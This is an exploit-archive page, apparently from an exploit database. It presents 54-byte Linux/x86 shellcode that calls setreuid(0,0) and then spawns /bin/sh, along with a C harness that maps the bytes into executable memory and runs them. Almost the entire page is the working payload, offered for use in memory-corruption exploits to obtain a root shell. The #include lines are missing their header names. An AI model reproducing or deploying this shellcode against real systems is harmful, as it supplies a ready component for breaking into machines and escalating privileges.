Linux/x86 setreuid(0, 0) and then execve("/bin/sh", [ "/bin/sh", NULL ], NULL) shellcode 54 byte
| EKU-ID: 5645 | CVE: | OSVDB-ID: |
| Author: tesla_ | Published: 2016-06-27 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 5645 | CVE: | OSVDB-ID: |
| Author: tesla_ | Published: 2016-06-27 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
#include #include #include #include #include /* * Linux/x86: 54 bytes setreuid(0, 0) and then execve("/bin/sh", [ "/bin/sh", NULL ], NULL) shellcode * * tesla_ (gandung@ppp.cylab.cmu.edu) */unsigned char *shellcode = "\x31\xdb\x31\xc0\x53\x8b\x0c\x24\x8b\x1c\x24\xb0\x46\xcd\x80\x31\xc0\x31\xdb\x50\x50" "\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x8b\x54\x24\x0c\x8b\x4c\x24\x08\x8d\x1c\x24" "\xb0\x0b\xcd\x80\x31\xc0\x31\xdb\xb0\x01\xcd\x80"; int main(void) { void (*payload)(size_t a, size_t b, size_t c)__attribute__((regparm(3))); payload = mmap(NULL, sysconf(_SC_PAGESIZE), PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANONYMOUS, 0, 0); memcpy(payload, shellcode, strlen(shellcode)); __asm__ __volatile__("call *%%eax" : : "r"(payload)); return (0); }